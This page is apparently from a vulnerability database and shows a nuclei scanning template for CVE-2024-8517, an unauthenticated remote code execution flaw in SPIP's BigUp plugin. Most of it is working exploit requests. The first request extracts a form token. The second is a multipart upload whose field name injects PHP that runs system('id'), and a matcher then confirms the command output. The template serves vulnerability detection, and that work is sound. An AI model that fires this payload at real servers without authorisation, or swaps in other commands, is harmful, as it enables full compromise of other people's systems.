Lucene search
K

SPIP BigUp Plugin - Remote Code Execution

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

SPIP BigUp Plugin - Remote Code Execution, allows arbitrary OS command execution via crafted multipart file upload HTTP reques

Related
Refs
Code
id: CVE-2024-8517

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through crafted multipart file upload requests, achieving complete server compromise and full control of the SPIP installation.
  remediation: |
    Update SPIP to version 4.3.2, 4.2.16, or 4.1.18 or later to address the command injection vulnerability in the BigUp plugin.
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.94618
    epss-percentile: 0.99845
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  tags: cve,cve2024,intrusive,spip,rce,vuln

flow: http(1) && http(2)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="oubli"

        {{email}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207e89ad528a0c073323c528bbac7d3408978b4b1db18834318eb29cd8d63b7686022100a2c413d47efe761c88e53fac635208fff75cb60b47268562acfa0b1d31b3eb2c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation